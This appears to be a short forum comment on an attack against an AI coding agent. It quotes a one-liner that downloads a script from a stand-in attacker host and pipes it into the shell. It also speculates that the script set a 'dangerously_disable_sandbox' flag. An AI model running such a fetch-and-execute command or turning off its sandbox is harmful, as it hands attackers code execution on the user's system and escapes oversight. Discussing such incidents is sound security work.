> cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

The cat invocation here is completely irrelevant?! The issue is access to random network resources and access to the shell and combining both.

Process substitution is a new concept to me. Definitely adding that method to the toolbox.

It'd be nice to see exactly what the bugbot shell script contained. Perhaps it is what modified the dangerously_disable_sandbox flag, then again, "by default" makes me think it's set when launched.